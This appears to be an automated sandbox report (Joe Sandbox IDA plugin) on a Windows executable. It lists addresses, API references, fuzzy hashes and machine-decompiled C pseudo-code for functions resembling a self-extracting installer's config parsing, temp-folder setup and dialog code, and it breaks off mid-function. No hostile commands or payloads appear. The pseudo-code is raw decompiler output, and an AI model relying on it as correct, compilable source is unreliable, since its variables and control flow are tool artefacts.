0x00000000
0x00000000
0x00417219
0x00417219
0x0041721c
0x0041721f
0x00417224
0x0041722d
0x00417230
0x00417233
0x0041723c
0x00417242
0x00417245
0x00417246
0x00417249
0x0041724c
0x00416f90
0x00416f90
0x00000000
0x00416f90
0x00000000
0x00000000
0x00000000
0x00000000
0x00417200
0x00417200
0x00417200
0x00417203
0x00417207
0x00000000
0x00000000
0x00417209
0x0041720a
0x0041720d
0x00000000
0x00000000
0x00417214
0x00417214
0x00000000
0x00417214
0x00417211
0x00000000
0x00417211
0x004171cf
0x004171d3
0x004171d5
0x00000000
0x00000000
0x00000000
0x00000000
0x004171d7
0x004171d7
0x004171d7
0x004171da
0x004171df
0x004171e2
0x00000000
0x00000000
0x004171e4
0x004171e7
0x004171eb
0x00000000
0x00000000
0x004171ed
0x004171f0
0x004171f4
0x004171f7
0x00000000
0x00000000
0x00000000
0x004171f7
0x00000000
0x00000000
0x00000000
0x00000000
0x00417172
0x00417172
0x00417172
0x00417175
0x0041717a
0x0041717d
0x00000000
0x00000000
0x00417183
0x00417186
0x0041718a
0x00000000
0x00000000
0x00417190
0x00417194
0x00417197
0x0041719c
0x0041719f
0x00000000
0x00000000
0x004171a5
0x004171a8
0x004171ac
0x00000000
0x00000000
0x004171b2
0x004171b5
0x004171bc
0x004171bf
0x00000000
0x00000000
0x00000000
0x004171bf
0x00000000
0x00417172
0x00417138
0x0041713b
0x00000000
0x00000000
0x0041713d
0x00417141
0x00000000
0x00000000
0x00000000
0x00000000
0x00416fd4
0x00416fd4
0x00416fd4
0x00416fd7
0x00416fd9
0x00416fde
0x00416fe1
0x00416fe3
0x00000000
0x00000000
0x00416fec
0x00416fef
0x00416ff2
0x00416ff5
0x00000000
0x00000000
0x00416ffb
0x00417003
0x00417005
0x0041725c
0x0041725c
0x00417261
0x00417261
0x00417264
0x0041727a
0x0041727d
0x00417282
0x00417285
0x0041728e
0x00000000
0x00000000
0x00417294
0x00417294
0x00417266
0x00417268
0x00000000
0x00000000
0x00417273
0x00000000
0x00417273
0x0041700d
0x00417011
0x00417015
0x00417019
0x0041701b
0x0041701e
0x00417020
0x00417054
0x00417059
0x0041705c
0x00417063
0x00417068
0x0041706e
0x0041706e
0x00417073
0x00417077
0x0041707e
0x004170a3
0x004170a6
0x004170a9
0x004170ad
0x00000000
0x00000000
0x004170b3
0x004170b7
0x0041711f
0x0041711f
0x00417125
0x00417128
0x00000000
0x00000000
0x0041712e
0x00000000
0x0041712e
0x004170bb
0x004170c3
0x004170c6
0x004170c8
0x00000000
0x00000000
0x004170ce
0x004170d2
0x004170f4
0x004170f4
0x004170fb
0x004170fd
0x00417101
0x00417103
0x00417106
0x00417108
0x0041710b
0x00417110
0x00417114
0x00417117
0x00417119
0x00417119
0x00417117
0x00417106
0x00417101
0x0041711c
0x0041711c
0x0041711c
0x0041711c
0x00000000
0x0041711c
0x004170d4
0x004170d8
0x00000000
0x00000000
0x004170da
0x004170dd
0x004170df
0x004170e2
0x004170e7
0x004170ea
0x004170ed
0x004170ef
0x004170ef
0x004170ed
0x00000000
0x00417080
0x00417080
0x00417082
0x00417087
0x0041708a
0x0041708d
0x00000000
0x00000000
0x00417093
0x00417095
0x0041709a
0x0041709d
0x00000000
0x00000000
0x00000000
0x0041709d
0x00417022
0x00417022
0x00417027
0x0041702e
0x0041703b
0x0041703e
0x00417041
0x00417043
0x00417046
0x00417049
0x0041704c
0x0041704f
0x00417024
0x00000000
0x00417051
0x00417051
0x00000000
0x00417051
0x0041704f
0x00417020
0x00000000
0x00416fd4
0x00417257
0x00417257
0x00000000
0x00417257
0x00416eed
0x00416efd
0x00416f00
0x00416f09
0x00416f18
0x00416f21
0x00416f24
0x00416f29
0x00416f2c
0x00416f31
0x00416f34
0x00416f3e
0x00416f49
0x00416f54
0x00416f59
0x00416f61
0x00000000
0x00000000
0x00000000
0x00000000
0x00416f67
0x00416f67
0x00416f6a
0x00416f6f
0x00416f72
0x00416f75
0x00416f78
0x00416f7e
0x00416f82
0x00416f83
0x00416f86
0x00000000

APIs

Part of subcall function 004161F4: ??3@YAXPAX@Z.MSVCRT ref: 004161F9
Part of subcall function 004161F4: ??2@YAPAXI@Z.MSVCRT ref: 00416214

Part of subcall function 00416221: ??3@YAXPAX@Z.MSVCRT ref: 00416226
Part of subcall function 00416221: ??2@YAPAXI@Z.MSVCRT ref: 00416232

Part of subcall function 0040C020: ??3@YAXPAX@Z.MSVCRT ref: 0040C034
Part of subcall function 0040C020: ??2@YAPAXI@Z.MSVCRT ref: 0040C04E
Part of subcall function 0040C020: memcpy.MSVCRT ref: 0040C068

??3@YAXPAX@Z.MSVCRT ref: 00416F2C
??3@YAXPAX@Z.MSVCRT ref: 00416F34

Part of subcall function 004161C7: ??3@YAXPAX@Z.MSVCRT ref: 004161CC
Part of subcall function 004161C7: ??2@YAPAXI@Z.MSVCRT ref: 004161E7

Part of subcall function 004167C5: memset.MSVCRT ref: 004167DD

Strings

!, xrefs: 004170CE
@, xrefs: 004170A9
, xrefs: 004170B3

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@$memcpymemset
String ID: $!$@
API String ID: 1807930983-2517134481
Opcode ID: 5a0cd3f31a62d73317b64d85696ae4bafc855b5bd178d0b226f6844185e35667
Instruction ID: f55dd101b204f21da1f631f5c3487a3bc2704fd2e33f175c23863e5c7b78e8a3
Opcode Fuzzy Hash: 5a0cd3f31a62d73317b64d85696ae4bafc855b5bd178d0b226f6844185e35667
Instruction Fuzzy Hash: C0E13D70904249DFCF14DF95C580AEDBBB2BF49314F25849EE806AB352D739A9C2CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004013A6, Relevance: 9.1, APIs: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004013A6() {
				signed int _v8;
				signed int _v12;
				void* __ecx;
				signed int _t31;
				signed int _t33;
				signed int _t34;
				intOrPtr* _t35;
				long _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t41;
				signed int _t49;
				void* _t51;
				signed int _t66;
				void* _t69;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;

				_push(_t51);
				_push(_t51);
				_t69 = _t51;
				if(( *0x41e774 & 0x00000040) != 0) {
					L19:
					_t31 = 0;
					L20:
					return _t31;
				}
				_t76 =  *0x41e704;
				if( *0x41e704 > 0) {
					goto L19;
				}
				_t77 = E00401341(_t51, _t76);
				if(_t77 == 0) {
					goto L19;
				}
				_t33 = E004011CA(_t69);
				_t66 = 4;
				_t49 = _t33;
				_t34 = _t33 * _t66;
				_push( ~(0 | _t77 > 0x00000000) | _t34);
				L004191BC();
				_t73 = 0;
				_v12 = _t34;
				_v8 = 0;
				if(_t49 <= 0) {
					L8:
					_push(_v12);
					L004191B0();
					goto L19;
				} else {
					goto L4;
				}
				do {
					L4:
					_t35 = E00407376(_t73);
					if(_t35 != 0) {
						_t35 = _v12;
						_v8 = _v8 + 1;
						 *((intOrPtr*)(_t35 + _v8 * 4)) = _t73;
					}
					_t73 = _t73 + 1;
				} while (_t73 < _t49);
				if(_v8 != 0) {
					_push(0x14);
					L004191BC();
					__eflags = _t35;
					if(_t35 == 0) {
						_t74 = 0;
						__eflags = 0;
					} else {
						_t74 = E00401280(_t35, _t35);
					}
					__eflags = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)( *_t74 + 4))(_t74);
					}
					_t36 = GetTickCount();
					 *(_t69 + 0x88) = _t36;
					_t22 = _t69 + 8; // 0xbc2608
					_t37 =  *_t22;
					_t38 =  *((intOrPtr*)( *_t37 + 0x1c))(_t37, _v12, _v8, 0, _t74);
					__eflags = _t38;
					if(_t38 != 0) {
						L17:
						_push(_v12);
						L004191B0();
						__eflags = _t74;
						if(_t74 != 0) {
							 *((intOrPtr*)( *_t74 + 8))(_t74);
						}
						goto L19;
					} else {
						_t41 =  *((intOrPtr*)(_t74 + 0xc));
						__eflags =  *((intOrPtr*)(_t41 + 0x10));
						if( *((intOrPtr*)(_t41 + 0x10)) == 0) {
							goto L17;
						}
						L004191B0();
						 *((intOrPtr*)( *_t74 + 8))(_t74, _v12);
						_t31 = 1;
						goto L20;
					}
				}
				goto L8;
			}

0x004013a9
0x004013aa
0x004013b5
0x004013b7
0x004014a1
0x004014a1
0x004014a3
0x004014a7
0x004014a7
0x004013bd
0x004013c4
0x00000000
0x00000000
0x004013cf
0x004013d1
0x00000000
0x00000000
0x004013d9
0x004013e2
0x004013e3
0x004013e5
0x004013ee
0x004013ef
0x004013f4
0x004013f7
0x004013fa
0x004013ff
0x00401424
0x00401424
0x00401427
0x00000000
0x00000000
0x00000000
0x00000000
0x00401401
0x00401401
0x00401403
0x0040140a
0x0040140f
0x00401412
0x00401415
0x00401415
0x00401418
0x00401419
0x00401422
0x0040142f
0x00401431
0x00401437
0x00401439
0x00401446
0x00401446
0x0040143b
0x00401442
0x00401442
0x00401448
0x0040144a
0x0040144f
0x0040144f
0x00401452
0x0040145d
0x00401463
0x00401463
0x0040146c
0x0040146f
0x00401471
0x0040148e
0x0040148e
0x00401491
0x00401497
0x00401499
0x0040149e
0x0040149e
0x00000000
0x00401473
0x00401473
0x00401476
0x00401479
0x00000000
0x00000000
0x0040147e
0x00401487
0x0040148a
0x00000000
0x0040148a
0x00401471
0x00000000

APIs

??2@YAPAXI@Z.MSVCRT ref: 004013EF
??3@YAXPAX@Z.MSVCRT ref: 00401427
??2@YAPAXI@Z.MSVCRT ref: 00401431
GetTickCount.KERNEL32 ref: 00401452
??3@YAXPAX@Z.MSVCRT ref: 0040147E
??3@YAXPAX@Z.MSVCRT ref: 00401491

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@$CountTick
String ID:
API String ID: 590505967-0
Opcode ID: 809a018af5b21b7c4fa30465988eb3a550041bd519db1216a43ede4a053ad3f7
Instruction ID: a6903403f5f4fcf2204198b93a2ae2fd4058f2025a7845204c1723fd466c5d3b
Opcode Fuzzy Hash: 809a018af5b21b7c4fa30465988eb3a550041bd519db1216a43ede4a053ad3f7
Instruction Fuzzy Hash: F531D331A00111AFCF25AFA5C8899AEB7A5AF05314F14407FF942B72B1DB388D81D798

Uniqueness

Uniqueness Score: -1.00%

Function 00406013, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406013(void* __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _v20;
				char _v24;
				signed int _v32;
				void* _v36;
				short _v40;
				short _v44;
				signed int _v52;
				short _v56;
				char _v60;
				void* __esi;
				void* _t39;
				void* _t48;
				signed int _t55;
				void* _t56;
				void* _t57;

				_v52 = _v52 | 0xffffffff;
				_t57 = __ecx;
				_v8 = __edx;
				_v56 = 0;
				_v60 = 0x41ab9c;
				_v44 = 0;
				_v40 = 0;
				_t39 = E00411412(__ecx, 1);
				_t79 = _t39;
				if(_t39 != 0) {
					L6:
					E00411743(_t39,  &_v24);
					E004117A8( &_v24, 0x41e484);
					E00411846( &_v24, ";!@Install@!UTF-8!");
					E00411846( &_v24,  *_v8);
					E00411846( &_v24, ";!@InstallEnd@!");
					_t48 = E0041249F(0x41ab9c,  &_v60, _v24, _v20,  &_v12);
					__eflags = _t48;
					if(_t48 != 0) {
						L9:
						_push(_v24);
						L10:
						L004191B0();
						_v60 = 0x41ab9c;
						E0041115B( &_v52);
						return 0;
					}
					__eflags = _v12 - _v20;
					if(_v12 != _v20) {
						goto L9;
					}
					_push(_v24);
					L004191B0();
					_v60 = 0x41ab9c;
					E0041115B( &_v52);
					return 1;
				}
				E00411B84( &_v36, __ecx);
				_t55 = E004038FB( &_v36, _t79);
				if(_t55 >= 0) {
					_t76 = _v36;
					_v32 = _t55;
					 *((short*)(_v36 + _t55 * 2)) = 0;
					_t56 = E00404772(_v36, _t76);
					__eflags = _t56;
					if(_t56 == 0) {
						goto L2;
					}
					_v44 = 0;
					_v40 = 0;
					_t39 = E00411412(_t57, 1);
					__eflags = _t39;
					if(_t39 == 0) {
						goto L2;
					}
					_push(_v36);
					L004191B0();
					goto L6;
				}
				L2:
				_push(_v36);
				goto L10;
			}

0x00406019
0x00406020
0x0040602f
0x00406032
0x00406035
0x00406038
0x0040603b
0x0040603e
0x00406043
0x00406045
0x0040609a
0x0040609d
0x004060aa
0x004060b7
0x004060c4
0x004060d1
0x004060e4
0x004060e9
0x004060eb
0x0040610d
0x0040610d
0x00406110
0x00406110
0x00406119
0x0040611c
0x00000000
0x00406121
0x004060f0
0x004060f3
0x00000000
0x00000000
0x004060f5
0x004060f8
0x00406101
0x00406104
0x00000000
0x00406109
0x0040604b
0x00406053
0x0040605a
0x00406064
0x00406069
0x0040606c
0x00406073
0x00406078
0x0040607a
0x00000000
0x00000000
0x00406082
0x00406085
0x00406088
0x0040608d
0x0040608f
0x00000000
0x00000000
0x00406091
0x00406094
0x00000000
0x00406099
0x0040605c
0x0040605c
0x00000000

APIs

??3@YAXPAX@Z.MSVCRT ref: 004060F8

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 00406094
??3@YAXPAX@Z.MSVCRT ref: 00406110

Strings

;!@InstallEnd@!, xrefs: 004060C9
;!@Install@!UTF-8!, xrefs: 004060AF

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 750647942-372238525
Opcode ID: 5e59d807e14aaf3d26393f531f0b858b024678a1285ae17b53bb4701f65fa082
Instruction ID: 6115e21da8c550f7c259bf06f757151a7c4d16b5fd4a7f66b5d549820aeda24a
Opcode Fuzzy Hash: 5e59d807e14aaf3d26393f531f0b858b024678a1285ae17b53bb4701f65fa082
Instruction Fuzzy Hash: 69315271D00219ABCF05EF95DD929EEBB75BF54314F20002BF512B22E2DB381A95CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040439D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040439D(intOrPtr __edx, void* __eflags) {
				void* __ecx;
				void* _t8;
				long _t11;
				WCHAR* _t12;
				short* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t34;
				WCHAR** _t35;
				short _t36;
				void* _t37;

				 *((intOrPtr*)(_t37 + 0x10)) = __edx;
				_t35 = _t24;
				E00411B60(_t8, _t24);
				_t11 = GetTempPathW(1, E004042F3(_t35, __edx, 2));
				_t36 = 0;
				_t35[1] = 0;
				 *( *_t35) = 0;
				if(_t11 > 0) {
					_t3 = _t11 + 1; // 0x1
					_t23 = _t3;
					GetTempPathW(_t23, E004042F3(_t35, 0, _t23));
					E004042D8(_t35);
				}
				_t12 = _t35[1];
				_t22 =  &(_t12[7]);
				_t34 = _t12 + _t12;
				while(1) {
					wsprintfW(E004042F3(_t35, 0, _t22) + _t34,  *(_t37 + 0x14), _t36);
					_t37 = _t37 + 0xc;
					E004042D8(_t35);
					if(GetFileAttributesW( *_t35) == 0xffffffff) {
						break;
					}
					_t36 = _t36 + 1;
					if(_t36 < 0xfff) {
						continue;
					}
					break;
				}
				return _t35;
			}

0x004043a2
0x004043a6
0x004043a8
0x004043bf
0x004043c3
0x004043c7
0x004043ca
0x004043cf
0x004043d1
0x004043d1
0x004043de
0x004043e2
0x004043e2
0x004043e7
0x004043ea
0x004043ed
0x004043f0
0x00404400
0x00404406
0x0040440b
0x0040441b
0x00000000
0x00000000
0x0040441d
0x00404424
0x00000000
0x00000000
0x00000000
0x00404424
0x0040442d

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT ref: 0040432C

GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
wsprintfW.USER32 ref: 00404400
GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412

Strings

PreExtract, xrefs: 004043A1

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: PathTemp$??2@??3@AttributesFilewcsncpywsprintf
String ID: PreExtract
API String ID: 342973707-1883995278
Opcode ID: 3caa998f6f9b15566bfd3027daf281284352955ee3439a0eb514e667720d2acc
Instruction ID: 87ce6a64adcde4581c58fbcd89a197d799c86788f89504f70527ff8ba021350e
Opcode Fuzzy Hash: 3caa998f6f9b15566bfd3027daf281284352955ee3439a0eb514e667720d2acc
Instruction Fuzzy Hash: EE0100B07012086BC214AF6ADC4492EF399EFC0758B01457EF206A76E2CF79991587A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040758D, Relevance: 7.6, APIs: 5, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040758D() {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t41;
				intOrPtr _t42;
				signed int _t59;
				signed int _t60;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				intOrPtr* _t69;
				void* _t71;
				void* _t72;

				_push(_t42);
				_push(_t42);
				_v12 = _t42;
				if(( *0x41e774 & 0x00000080) == 0) {
					L9:
					_t23 = 0;
					L10:
					return _t23;
				}
				_t41 = 0;
				_t71 =  *0x41e704 - _t41; // 0x0
				if(_t71 > 0) {
					goto L9;
				}
				_t72 = E00401341(0x41e7b8, _t71);
				if(_t72 == 0) {
					goto L9;
				}
				_t25 = E004011CA(0x41e7b8);
				_t59 = 4;
				_t63 = _t25;
				_t60 = _t25 * _t59 >> 0x20;
				_t26 = _t25 * _t59;
				_push( ~(0 | _t72 > 0x00000000) | _t26);
				L004191BC();
				_t68 = 0;
				_v8 = _t26;
				if(_t63 == 0) {
					L8:
					_push(_v8);
					L004191B0();
					goto L9;
				} else {
					goto L4;
				}
				do {
					L4:
					_t27 = E0040742F(_t68);
					if(_t27 != 0) {
						_t27 = _v8;
						 *((intOrPtr*)(_t27 + _t41 * 4)) = _t68;
						_t41 = _t41 + 1;
					}
					_t68 = _t68 + 1;
				} while (_t68 < _t63);
				if(_t41 != 0) {
					_push(0x48);
					L004191BC();
					__eflags = _t27;
					if(_t27 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = E00402671(_t27);
					}
					__eflags = _t69;
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 4))(_t69);
					}
					_t64 = _v12;
					E00407474(_t64, _t60);
					_t17 = _t64 + 4; // 0x700062
					E0040242A(_t69,  *_t17);
					_t30 =  *0x41e7c0; // 0xbc2608
					_t31 =  *((intOrPtr*)( *_t30 + 0x1c))(_t30, _v8, _t41, 0, _t69);
					_push(_v8);
					__eflags = _t31;
					if(_t31 == 0) {
						L004191B0();
						__eflags = _t69;
						if(_t69 != 0) {
							 *((intOrPtr*)( *_t69 + 8))(_t69);
						}
						_t23 = 1;
						goto L10;
					} else {
						L004191B0();
						__eflags = _t69;
						if(_t69 != 0) {
							 *((intOrPtr*)( *_t69 + 8))(_t69);
						}
						goto L9;
					}
				}
				goto L8;
			}

0x00407590
0x00407591
0x0040759c
0x0040759f
0x00407606
0x00407606
0x00407608
0x0040760c
0x0040760c
0x004075a1
0x004075a3
0x004075a9
0x00000000
0x00000000
0x004075b7
0x004075b9
0x00000000
0x00000000
0x004075bd
0x004075c6
0x004075c7
0x004075c9
0x004075c9
0x004075d2
0x004075d3
0x004075d8
0x004075db
0x004075e0
0x004075fd
0x004075fd
0x00407600
0x00000000
0x00000000
0x00000000
0x00000000
0x004075e2
0x004075e2
0x004075e4
0x004075eb
0x004075ed
0x004075f0
0x004075f3
0x004075f3
0x004075f4
0x004075f5
0x004075fb
0x0040760d
0x0040760f
0x00407615
0x00407617
0x00407624
0x00407624
0x00407619
0x00407620
0x00407620
0x00407626
0x00407628
0x0040762d
0x0040762d
0x00407630
0x00407635
0x0040763a
0x0040763f
0x00407644
0x00407653
0x00407656
0x00407659
0x0040765b
0x0040766f
0x00407675
0x00407677
0x0040767c
0x0040767c
0x0040767f
0x00000000
0x0040765d
0x0040765d
0x00407663
0x00407665
0x0040766a
0x0040766a
0x00000000
0x00407665
0x0040765b
0x00000000

APIs

??2@YAPAXI@Z.MSVCRT ref: 004075D3
??3@YAXPAX@Z.MSVCRT ref: 00407600
??2@YAPAXI@Z.MSVCRT ref: 0040760F
??3@YAXPAX@Z.MSVCRT ref: 0040765D
??3@YAXPAX@Z.MSVCRT ref: 0040766F

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: a13cf4720f1135557049f1cfc06715683a408fe7532ec61320bd61ced9d40d14
Instruction ID: a987b35fad98e116647973f19acdcfb235c3ad9f5bac28a4ad03e7c43b89f24f
Opcode Fuzzy Hash: a13cf4720f1135557049f1cfc06715683a408fe7532ec61320bd61ced9d40d14
Instruction Fuzzy Hash: B2315531E04A116BDB266BA9C8159AFB7A58F01724B14047FFD037B3D1DB39AC42C68E

Uniqueness

Uniqueness Score: -1.00%

Function 0040161A, Relevance: 7.6, APIs: 5, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040161A(void* __ecx) {
				signed int _v5;
				signed int _v16;
				signed short* _v20;
				char _v32;
				signed int _t23;
				signed short* _t26;
				signed int _t28;
				signed short* _t31;
				void* _t35;
				signed short* _t39;
				signed int _t46;
				signed int _t49;
				WCHAR** _t50;
				void* _t51;
				signed int _t52;

				_t35 = __ecx;
				_t50 = 0x41e080;
				if( *0x41e080 == 0) {
					L4:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t23 = lstrlenW( *_t50);
					_t46 =  *_t50;
					_t49 = _t23;
					if(E0040386E(_t35, _t46, _t49) == 0 &&  *((short*)(_t35 + _t49 * 2)) == 0x3d) {
						break;
					}
					_t50 =  &(_t50[1]);
					if( *_t50 != 0) {
						continue;
					}
					goto L4;
				}
				E00411B84( &_v20, _t35);
				_t39 = _v20;
				__eflags =  *_t39;
				_t26 = _t39;
				_v5 = 0;
				if(__eflags == 0) {
					L15:
					_t28 = _t26 - _t39 >> 1;
					_v16 = _t28;
					_t51 = _t28 + _t28;
					 *((short*)(_t51 + _t39)) = 0;
					E00404473( &_v32,  &_v20, __eflags, 0xfde9);
					_t31 = E00405112( &_v32, 1, __eflags);
					_push(_v32);
					__eflags = _t31;
					if(_t31 != 0) {
						L004191B0();
						_push(_v20);
						L004191B0();
						return _t51 + _t35;
					}
					L004191B0();
					_push(_v20);
					L004191B0();
					return 1;
				} else {
					goto L7;
				}
				do {
					L7:
					_t52 =  *_t26 & 0x0000ffff;
					__eflags = _t52 - 0x20;
					if(_t52 > 0x20) {
						goto L9;
					}
					__eflags = _v5;
					if(__eflags == 0) {
						goto L15;
					}
					L9:
					__eflags = _t52 - 0x22;
					if(_t52 != 0x22) {
						__eflags = _t52 - 0x5c;
						if(_t52 == 0x5c) {
							__eflags = _t26[1] - 0x22;
							if(_t26[1] == 0x22) {
								_t26 =  &(_t26[1]);
								__eflags = _t26;
							}
						}
					} else {
						__eflags = _v5;
						_t46 = _t46 & 0xffffff00 | _v5 == 0x00000000;
						_v5 = _t46;
					}
					_t26 =  &(_t26[1]);
					__eflags =  *_t26;
				} while (__eflags != 0);
				goto L15;
			}

0x0040162a
0x0040162c
0x00401631
0x0040165a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401633
0x00401633
0x00401635
0x0040163b
0x0040163d
0x00401649
0x00000000
0x00000000
0x00401652
0x00401658
0x00000000
0x00000000
0x00000000
0x00401658
0x00401665
0x0040166a
0x0040166d
0x00401671
0x00401673
0x00401677
0x004016b0
0x004016b2
0x004016b4
0x004016b7
0x004016bc
0x004016cb
0x004016d5
0x004016da
0x004016dd
0x004016df
0x004016f8
0x004016fd
0x00401700
0x00000000
0x00401707
0x004016e1
0x004016e6
0x004016e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00401679
0x00401679
0x00401679
0x0040167c
0x0040167f
0x00000000
0x00000000
0x00401681
0x00401685
0x00000000
0x00000000
0x00401687
0x00401687
0x0040168a
0x00401698
0x0040169b
0x0040169d
0x004016a2
0x004016a4
0x004016a4
0x004016a4
0x004016a2
0x0040168c
0x0040168c
0x00401690
0x00401693
0x00401693
0x004016a7
0x004016aa
0x004016aa
0x00000000

APIs

lstrlenW.KERNEL32(0041E080,?,00BC250E,0041E7B8,?,?,?,?,?,?,004019E3), ref: 00401635
??3@YAXPAX@Z.MSVCRT ref: 004016E1
??3@YAXPAX@Z.MSVCRT ref: 004016E9
??3@YAXPAX@Z.MSVCRT ref: 004016F8
??3@YAXPAX@Z.MSVCRT ref: 00401700

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: a111a310902c598d64a9a5875eea695a509e34d4ca8a34a55aa007f4e1ecc8c3
Instruction ID: 3b55230dadd2a4d047f6e8a8713cbcc3279512281016c63c74d99a53e3c26446
Opcode Fuzzy Hash: a111a310902c598d64a9a5875eea695a509e34d4ca8a34a55aa007f4e1ecc8c3
Instruction Fuzzy Hash: 8D21C232D042159BDB20AB65CC457EAB7B5AF11304F08487BE842B32E1E77A5C85CA4D

Uniqueness

Uniqueness Score: -1.00%

Function 00409278, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409278(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				struct _SHFILEINFOW _v712;
				short _v1236;
				void* _t32;
				void* _t40;
				void* _t44;

				_t40 = __edx;
				_t44 = __ecx;
				E00407A29(__ecx, 0x4b6,  &_v20);
				 *((intOrPtr*)(_t44 + 0x58)) = _v8 - _v16 + 2;
				E00407ABB(_t44, 0x4b6, 1);
				E00407ABB(_t44, 0x4b6, 1);
				_v712.hIcon = _v712.hIcon & 0x00000000;
				memset( &(_v712.iIcon), 0, 0x2b0);
				GetSystemDirectoryW( &_v1236, 0x104);
				SHGetFileInfoW( &_v1236, 0,  &_v712, 0x2b4, 0x103);
				 *(_t44 + 0x50) = _v712.hIcon;
				 *((intOrPtr*)(_t44 + 0x54)) = SetWindowLongW(GetDlgItem( *(_t44 + 4), 0x4b7), 0xfffffffc, E00408190);
				_t32 = E00408F3F(_t40);
